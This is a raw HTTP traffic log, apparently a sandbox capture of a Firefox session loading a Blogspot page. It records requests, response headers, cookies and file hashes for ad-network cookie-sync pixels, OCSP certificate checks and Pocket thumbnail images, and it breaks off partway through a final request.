set-cookie: A3=d=AQABBLQVNWMCEAdbElh2CBneeVpdPbGD5pkFEgEBAQFnNmM-YwAAAAAA_eMAAA&S=AQAAAktu40dTgL9c7MpoDRKrdyw; Expires=Fri, 29 Sep 2023 09:49:08 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
X-Firefox-Spdy: h2

                                        
                                            GET /ups/58422/occ?verify=true HTTP/1.1 
Host: ups.analytics.yahoo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://router.infolinks.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         18.156.0.31
HTTP/2 204 No Content
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
p3p: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
strict-transport-security: max-age=31536000
age: 0
server: ATS/9.1.10.25
set-cookie: A3=d=AQABBLQVNWMCEMjTrpcBS73H-uPadz_3mkUFEgEBAQFnNmM-YwAAAAAA_eMAAA&S=AQAAAkaz_iSGYa-bRef8juSq4aE; Expires=Fri, 29 Sep 2023 09:49:08 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
X-Firefox-Spdy: h2

                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         172.64.155.188
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 29 Sep 2022 03:49:08 GMT
Content-Length: 471
Connection: keep-alive
Last-Modified: Wed, 28 Sep 2022 01:57:50 GMT
Expires: Wed, 05 Oct 2022 01:57:49 GMT
Etag: "93f561a15087e2f3ffe5f2fc9db0cd4cc72e2d28"
Cache-Control: max-age=511120,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb3
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 7521bf47cf35b512-OSL

                                        
                                            GET /dyn/sonobi-usync?uid=7f7a386f-6904-49d7-a590-5a4a27296d93 HTTP/1.1 
Host: router.infolinks.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://router.infolinks.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         172.66.42.247
HTTP/2 200 OK
content-type: image/gif
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 35
cache-control: no-store, no-cache, private
set-cookie: SONOBIUSERCOOKIE=7f7a386f-6904-49d7-a590-5a4a27296d93; Domain=infolinks.com; Expires=Wed, 28-Dec-2022 03:49:08 GMT; Path=/; SameSite=None; Secure
pragma: no-cache
expires: Wed, 29 Sep 2021 03:49:08 GMT
p3p: CP="NON DSP NID OUR COR"
via: 1.1 google
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 7521bf486a8fb4fd-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 87a, 1 x 1\012- data
Size:   35
Md5:    c0a97b478925284bd94e3271f6197c08
Sha1:   543e1556715b858c654397c62c0894dd6f294703
Sha256: 16957a3bb9422d4ba380be3b630db7a310e87e65f224e2be865dd64dd0b5664d
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "25F075EFFBD8ACDED8F38D69EA17F673DE3E197B635274D4C52411EF577FE8E7"
Last-Modified: Thu, 29 Sep 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=18296
Expires: Thu, 29 Sep 2022 08:54:04 GMT
Date: Thu, 29 Sep 2022 03:49:08 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "25F075EFFBD8ACDED8F38D69EA17F673DE3E197B635274D4C52411EF577FE8E7"
Last-Modified: Thu, 29 Sep 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=18296
Expires: Thu, 29 Sep 2022 08:54:04 GMT
Date: Thu, 29 Sep 2022 03:49:08 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "25F075EFFBD8ACDED8F38D69EA17F673DE3E197B635274D4C52411EF577FE8E7"
Last-Modified: Thu, 29 Sep 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=18296
Expires: Thu, 29 Sep 2022 08:54:04 GMT
Date: Thu, 29 Sep 2022 03:49:08 GMT
Connection: keep-alive

                                        
                                            GET /dyn/zeta-usync?uid=5134455419326545778 HTTP/1.1 
Host: router.infolinks.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://router.infolinks.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         172.66.42.247
HTTP/2 200 OK
content-type: image/gif
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 35
cache-control: no-store, no-cache, private
set-cookie: ZTUSERCOOKIE=5134455419326545778; Domain=infolinks.com; Expires=Wed, 28-Dec-2022 03:49:08 GMT; Path=/; SameSite=None; Secure
pragma: no-cache
expires: Wed, 29 Sep 2021 03:49:08 GMT
p3p: CP="NON DSP NID OUR COR"
via: 1.1 google
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 7521bf487a98b4fd-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 87a, 1 x 1\012- data
Size:   35
Md5:    c0a97b478925284bd94e3271f6197c08
Sha1:   543e1556715b858c654397c62c0894dd6f294703
Sha256: 16957a3bb9422d4ba380be3b630db7a310e87e65f224e2be865dd64dd0b5664d
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "25F075EFFBD8ACDED8F38D69EA17F673DE3E197B635274D4C52411EF577FE8E7"
Last-Modified: Thu, 29 Sep 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=18296
Expires: Thu, 29 Sep 2022 08:54:04 GMT
Date: Thu, 29 Sep 2022 03:49:08 GMT
Connection: keep-alive

                                        
                                            GET /warn.php?section=General&pub=442632&format=300x250&ga=g HTTP/1.1 
Host: yllix.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://edoses.blogspot.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         185.66.200.224
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Thu, 29 Sep 2022 03:49:07 GMT
x-frame-options: SAMEORIGIN
X-Firefox-Spdy: h2

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F4a48a423-ea95-40fe-9f8b-55ca1ca874fc.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 9688
x-amzn-requestid: 68e9fd78-af17-4a8f-ad4b-6fe563ae94fe
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZMK4JHF5IAMFSXQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6334be9a-603f13d3016d77fa2ca94492;Sampled=0
x-amzn-remapped-date: Wed, 28 Sep 2022 21:37:30 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: gIg0vR5I9vnA6Z7MJtTNaXn2TK8YeHWWcJEodiNJ6BEB7z7LUrcV1Q==
via: 1.1 28a7186077f9b5270d98dd053f31303e.cloudfront.net (CloudFront), 1.1 556b99c6be8d7078b9f067347c62df6a.cloudfront.net (CloudFront), 1.1 google
date: Wed, 28 Sep 2022 21:45:26 GMT
age: 21822
etag: "523da6aeec4cc23897fe01b0bc8b5da254edb3a8"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   9688
Md5:    28799c10f9ea39af55c7003f4254cc60
Sha1:   523da6aeec4cc23897fe01b0bc8b5da254edb3a8
Sha256: 2d1640fbd1f61aee3f2be670b37eb06e20bb265f702a428fadb550a4b51d64ab
                                        
                                            GET /deb/?m=xch&rt=html&sid=0010b00002CpYhEAAV HTTP/1.1 
Host: de.tynt.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         67.202.105.32
HTTP/2 200 OK
content-type: text/html
                                        
cache-control: max-age=86400
expires: Fri, 30 Sep 2022 03:49:08 GMT
accept-ch: Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
referrer-policy: unsafe-url
content-length: 75
date: Thu, 29 Sep 2022 03:49:08 GMT
p3p: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with no line terminators
Size:   75
Md5:    1ca09ed98f39d2adb7fab3878d13c0cb
Sha1:   da2a6f2431a34dfcc99b6f4500833f783f149d19
Sha256: e170d20dbbd5a22f50118e25fa2eefb1e85d2ad780e5477ed3a9643186090442
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F22873375-e381-41ee-a4b6-18ad56172e59.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8508
x-amzn-requestid: 5568f81c-2f99-44bf-9bd8-f015c604c513
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZMJlzFywoAMFamw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6334bc8b-1d335c5c536e895a19b5965f;Sampled=0
x-amzn-remapped-date: Wed, 28 Sep 2022 21:28:43 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: 2RLqacSoBXtv1i-6fRV9nejJ5tulXVJ-VsKVDvsMqAgPqXKWe_2cJw==
via: 1.1 1b0911478686968732f973d6e5e31d10.cloudfront.net (CloudFront), 1.1 3cd7af07832481c336aa1c93c9b4a6fe.cloudfront.net (CloudFront), 1.1 google
date: Wed, 28 Sep 2022 21:49:15 GMT
age: 21593
etag: "a98da6b6ce993bd8f3b58ba42915cd9c4b45946c"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8508
Md5:    515e23ff5ef0fc336ac5ec7fd31dfacd
Sha1:   a98da6b6ce993bd8f3b58ba42915cd9c4b45946c
Sha256: 77c186eb00def4a978d1bfd9eac755f70bf465f622991aaf6681227aec3e118a
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F48e2707b-f3b2-4e52-99ae-03c359b698de.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8754
x-amzn-requestid: 175fc592-ed89-44fb-8cf7-8a4404f59d4b
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZC5OcHKkIAMFafA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633108c2-2c0c36007bc8bcb56a54e8a1;Sampled=0
x-amzn-remapped-date: Mon, 26 Sep 2022 02:04:50 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: -AhTOJwgY3-DnA_pYXdBL18wPP_fNeyDmZjkdkQ2J-xrBZSyRcdK3Q==
via: 1.1 71e7943ea0729c284a06faa05a567236.cloudfront.net (CloudFront), 1.1 ead78c395f4bede3ec6cd7ea180e3d3a.cloudfront.net (CloudFront), 1.1 google
date: Wed, 28 Sep 2022 20:59:31 GMT
age: 24577
etag: "ba797da9b2d6942161fa02a0e431de4868b84327"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8754
Md5:    556ea631652cbb77ff38dbe3bbc8c4d1
Sha1:   ba797da9b2d6942161fa02a0e431de4868b84327
Sha256: 130dab67cb6d80c741a7f2dadfd536bd6900204880dc3b68b2afbfa53dd3d781
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff5cbaf6d-fc16-4449-8b54-1d55f68eff4f.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 14073
x-amzn-requestid: 4ff72590-e28d-4d4b-af1a-4d62e75e3d66
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZMKnpEsJoAMFlBQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6334be30-38b014a25551aa0a2ab04ccf;Sampled=0
x-amzn-remapped-date: Wed, 28 Sep 2022 21:35:44 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: gP4V4fq53Z5BFfjDlx1LCR9AhUPTq0qusBaOY_UEXjJjM6SByqDgXg==
via: 1.1 efe54e8b68e074d39b2ecd249f85100a.cloudfront.net (CloudFront), 1.1 570075675953459325e00b7bcd171df2.cloudfront.net (CloudFront), 1.1 google
date: Wed, 28 Sep 2022 21:41:45 GMT
etag: "72603efba82d649ce5a7a0ca45dc830c0d9ef012"
age: 22043
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   14073
Md5:    11594ce7500d8776bfd5162b17f87d72
Sha1:   72603efba82d649ce5a7a0ca45dc830c0d9ef012
Sha256: 511f5aa33750cd4a02cf3968bf165ffa521e77cb4fb7135b516d7ad14e8b9d01
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F0734a230-932d-4bc0-bc12-9177b543b103.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5222
x-amzn-requestid: 984ed038-4b9b-4cd8-8d0b-084726359f13
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZMK2pEnZoAMFycw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6334be90-6b2fd0fe12e08c1248390a42;Sampled=0
x-amzn-remapped-date: Wed, 28 Sep 2022 21:37:20 GMT
x-amz-cf-pop: SFO5-P2, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: v9NOwLEMmyw8fCaD0DnIq_KsIhhPQg6Og4auBAIPpEdENoWbI4JOrA==
via: 1.1 f4367b41311e3e9a490d7461b7b85490.cloudfront.net (CloudFront), 1.1 591683988172c7980c4ebb318cbf18a8.cloudfront.net (CloudFront), 1.1 google
date: Wed, 28 Sep 2022 21:41:45 GMT
age: 22043
etag: "4a35c50b5b16779582a75078b6df090892358d3b"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5222
Md5:    eece069cebb7039dbba50ec1cd73daab
Sha1:   4a35c50b5b16779582a75078b6df090892358d3b
Sha256: 41ad701a8ea3dcbfc38cb0701f3b24a6b833f6b1197014e10530c40496b6a13c
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6362b4f1-5935-43c9-9147-6d019a1ea6cd.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 4235
x-amzn-requestid: 60825c64-7743-4b16-b80d-d1195ccb0f23
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZMK2nFsDoAMFRwg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6334be90-1898e5d9111db7c843c1ebb4;Sampled=0
x-amzn-remapped-date: Wed, 28 Sep 2022 21:37:20 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: C-XC9qsktkENdI6lWZp5RQjeEvrrFMUfBq1mA5dxEjRq5tkfL5Jsxw==
via: 1.1 0005a84c2971ff4f5bbb79e7ebc622a8.cloudfront.net (CloudFront), 1.1 ee8246c5442dace7525c74f6a799bb46.cloudfront.net (CloudFront), 1.1 google
date: Wed, 28 Sep 2022 21:40:46 GMT
age: 22102
etag: "2bbcd6305b4da3204bf1c04b6db23d44cfc84fbb"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4235
Md5:    30471179bd7cdeecea2fa4ea98701aef
Sha1:   2bbcd6305b4da3204bf1c04b6db23d44cfc84fbb
Sha256: 967e070aec3942c64cc6c4cfdc13d430825c9e5c26dbec5bb3d66237d5978dfc
                                        
                                            GET /dyn/zmn-usync?uid= HTTP/1.1 
Host: router.infolinks.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://router.infolinks.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         172.66.42.247
HTTP/2 200 OK
content-type: image/gif
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 35
cache-control: no-store
p3p: CP="NON DSP NID OUR COR"
via: 1.1 google
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 7521bf48cadab4fd-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 87a, 1 x 1\012- data
Size:   35
Md5:    c0a97b478925284bd94e3271f6197c08
Sha1:   543e1556715b858c654397c62c0894dd6f294703
Sha256: 16957a3bb9422d4ba380be3b630db7a310e87e65f224e2be865dd64dd0b5664d
                                        
                                            GET /ps/?ri=0010b00002CpYhEAAV&ru=https%3A%2F%2Frouter.infolinks.com%2Fdyn%2F33a-usync%3Fuid%3D33XUSERID33X HTTP/1.1 
Host: ssc-cms.33across.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         67.202.105.21
HTTP/2 204 No Content
                                        
x-33x-status: 2000208
server: 33XP005
date: Thu, 29 Sep 2022 03:49:08 GMT
X-Firefox-Spdy: h2

                                        
                                            GET /usersync2/rmpssp?sub=infolinks HTTP/1.1 
Host: sync.1rx.io
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         213.19.147.44
HTTP/2 302 Found
content-type: text/html
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
cache-control: no-store, no-cache, must-revalidate
expires: 0
pragma: no-cache
set-cookie: _rxuuid=%7B%22rx_uuid%22%3A%22RX-afd326b8-2518-4ad3-9995-37aae938f18d-003%22%2C%22zdxidn%22%3A%222069.56%22%7D; path=/; expires=Fri, 29 Sep 2023 03:49:08 GMT; domain=.1rx.io; samesite=none; secure; httponly
p3p: CP="This is not a P3P policy! See https://www.rhythmone.com/p3p to learn why"
location: https://sync.1rx.io/usersync2/rmpssp?sub=infolinks&zcc=1&cb=1664423348324
etag: RXafd326b825184ad3999537aae938f18d003
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /usermatch?cb=https%3A%2F%2Frouter.infolinks.com%2Fdyn%2Fix-usync%3Fuid%3D&s=191306&C=1 HTTP/1.1 
Host: ssum-sec.casalemedia.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://router.infolinks.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.18.18.126
HTTP/2 200 OK
content-type: text/html
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
cf-ray: 7521bf461b13b4ff-OSL
cache-control: no-cache
expires: 0
cf-cache-status: DYNAMIC
pragma: no-cache
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q72vBW1DhKB97u2zXbyVnMkFFDPStryVHmbVFIdFDocy1lcemGrHXyU%2F0yS6RETvfsadg4%2FhHfgfESs3Ih9H4c%2FwsfZDne3YqC%2FObjCboO2UcS9wHmiXyvYE3yPkuN7mMBLkG8UWDEcpMA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /usersync2/rmpssp?sub=infolinks&zcc=1&cb=1664423348324 HTTP/1.1 
Host: sync.1rx.io
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
